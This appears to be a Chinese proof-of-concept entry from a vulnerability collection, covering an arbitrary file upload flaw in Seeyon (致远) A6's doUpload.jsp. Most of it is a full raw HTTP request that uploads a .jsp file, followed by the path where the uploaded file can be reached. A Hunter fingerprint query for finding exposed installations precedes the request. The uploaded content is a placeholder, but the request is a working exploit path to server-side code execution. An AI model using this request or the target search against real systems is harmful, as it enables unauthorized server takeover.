致远A6 uploadForm 任意文件上传漏洞
一、漏洞简介
致远A6 uploadForm 存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
二、影响版本
- 致远A6
三、资产测绘
- hunter
web.body="seeyonDownLoadPic"
- 特征
四、漏洞复现
POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363639458542274369491015178429
Content-Length: 1508
Connection: close
Cookie: JSESSIONID=CA218004AFAADF7EC35C09307DBF7324; JSESSIONID=D58108CE272DEF63D6638B7614DBDF6F
Upgrade-Insecure-Requests: 1
-----------------------------363639458542274369491015178429
Content-Disposition: form-data; name="myfile"; filename="stc.jsp"
Content-Type: application/octet-stream
test
-----------------------------363639458542274369491015178429--
根据响应拼接上传文件位置
/yyoa/portal/upload/1700061612953.jsp